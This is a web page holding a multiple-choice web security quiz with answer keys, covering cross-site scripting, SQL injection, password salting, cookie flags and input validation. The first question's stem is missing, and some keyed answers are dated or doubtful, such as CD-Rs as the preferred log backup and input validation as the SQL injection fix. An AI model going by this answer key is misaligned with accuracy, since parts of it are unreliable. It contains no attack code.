Web Security Quiz

Description: This quiz is about the security on Web, contains question related to Cross Site Scripting (XSS), Security Best practices.
Number of Questions: 20
Created by:
Tags: security
Attempted 0/19 Correct 0 Score 0
  1. Hidden tags

  2. Query Strings

  3. Header

  4. Cookies

Correct Option: B

How can we prevent dictionary attacks on password hashes ?

  1. Hashing the password twice

  2. Encrypting the password using the private key

  3. Use an encryption algorithm you wrote your self so no one knows how it works

  4. Salting the hash

Correct Option: D

Implementing Access Control based on a hard coded IP address

  1. Can be done as it as an internal IP

  2. Can be done for internet facing servers as there are no chances of IP conflicts

  3. Is a good security practice

  4. Is a bad security practice

Correct Option: D

Temporary files

  1. Should be placed securely in a folder called “temp” in the web root

  2. Can be placed anywhere in the web root as long as there are no links to them

  3. Should be completely removed from the server

  4. Can be placed anywhere after changing the extension

Correct Option: C

What is the preferred medium for backing up log files ?

  1. Print the logs to a paper

  2. Create a copy of data in your laptop/desktop

  3. Copy the files to CD-R's

  4. None of the above

Correct Option: C

What is the common cause of buffer over flows, cross-site scripting, SQL injection and format string attacks?

  1. Unvalidated input

  2. Lack of authentication

  3. Improper error handing

  4. Insecure configuration management

Correct Option: A

Out of the following which one can be considered as a possible solutions for SQL injection vulnerability?

  1. Data Validation

  2. Secure Cookies

  3. Encryption

  4. Comprehensive exception handling

Correct Option: A

Which of the following is appropriate for customer emails regarding a limited time promotional offer?

  1. Request that the user authenticate him/herself by replying to the email with their account credentials.

  2. Personalized greeting line

  3. Providing easy access to the customer's account via a “Click Here” style link

  4. Sending the email from a domain set up specifically for the special offer

Correct Option: B

Cross Site Scripting is an attack against

  1. Client (Browser)

  2. Database

  3. Web Application

  4. Web Server

Correct Option: A

Which cookie flag, when set, will prevent their transmission over non secure channel?

  1. Secure

  2. Domain

  3. Expires

  4. Static

Correct Option: A

The main risk to a web application in a cross site scripting attack is …

  1. Compromise of users

  2. Loss of data integrity

  3. Destruction of data

  4. None of the above

Correct Option: A

Out of the following which can be considered as user input for which validation is not required

  1. Host Header

  2. Cookie

  3. Referrer Header

  4. None of the above

Correct Option: D

Which languages are vulnerable to Cross Site Scripting attacks ?

  1. Java

  2. ASP.Net

  3. Perl

  4. All of the above

Correct Option: D

What does “White List” data validation means?

  1. Data is validated against a list of values that are known to be valid

  2. Data is validated against a list of values that are known to be invalid

  3. Both of the above

  4. None of the above

Correct Option: A

Failing to properly validate uploaded files could result in:

  1. Arbitrary code execution

  2. Inadequate caching headers

  3. Distributed Denial of Service Attack against clients

  4. None of the above

Correct Option: A

In which of the following exploits does an attacker insert malicious code into a link that appears to be from a trustworthy source?

  1. Cross-Site Scripting

  2. Buffer over flows

  3. Command injection

  4. Path traversal attack

Correct Option: A

Which of the following should be stored in the cookie?

  1. Session ID

  2. Account Privileges

  3. UserName

  4. Password

Correct Option: A

What should be considered the most while doing data classification

  1. The type of users who would be accessing the data

  2. Availability, Integrity and Confidentiality

  3. The threat level the company faces

  4. Access controls protecting the data

Correct Option: B

What are the fundamental principles of Security?

  1. Availability, Integrity, Confidentiality

  2. Usability, Reliability, Accountability

  3. Quality, Accountability, Integrity

  4. None of the above

Correct Option: A
- Hide questions